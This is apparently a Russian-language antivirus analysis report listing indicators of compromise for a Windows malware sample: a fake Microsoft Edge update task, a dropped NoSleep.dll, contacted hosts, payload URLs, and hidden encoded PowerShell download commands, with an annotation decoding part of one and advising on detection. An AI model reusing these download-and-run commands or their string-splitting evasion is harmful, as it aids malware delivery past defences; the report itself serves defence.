Техническая информация
- <SYSTEM32>\tasks\microsoftedgeupdatetaskmachinecore{1575cc8a-457a-1700-652a-6bf2b031a266}
- %WINDIR%\tasks\microsoftedgeupdatetaskmachinecore{1575cc8a-457a-1700-652a-6af2b031a266}.job
- <SYSTEM32>\tasks\microsoftedgeupdatetaskmachinecore{1575cc8a-457a-1700-652a-6af2b031a266}
- %APPDATA%\nosleep.dll
- %ALLUSERSPROFILE%\qcvwubgtemgfr.jsonip
- '62.##4.41.69':80
- 'dr####gdhfhf.com':80
- 'google.com':80
- http://62.##4.41.69/dll.png
- http://62.##4.41.69/ldn.dll
- DNS ASK dr####gdhfhf.com
- DNS ASK google.com
- '<SYSTEM32>\cmd.exe' /c powershell -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoAC...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoAC...
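- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABw... (видимая часть аргумента -enc — это Base64 от текста в UTF-16LE; она декодируется в «  $f5='bClient).Downlo'; $f1='(New-Object Net.We'; $f3='adString(''http». Судя по этим фрагментам, вызов загрузки разбит на строковые куски и, по-видимому, собирается уже во время выполнения; остаток команды обрезан. Поэтому поиск цельных подстрок вроде «DownloadString» даже в декодированной командной строке такой запуск не найдёт. Для обнаружения надёжнее опираться на сам запуск powershell с -enc из cmd.exe со скрытым окном, на журнал блоков сценариев PowerShell и на перечисленные выше сетевые индикаторы.)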
- '<SYSTEM32>\cmd.exe' /c rundll32 %APPDATA%\NoSleep.dll ChkdskExs
- '<SYSTEM32>\rundll32.exe' %APPDATA%\NoSleep.dll ChkdskExs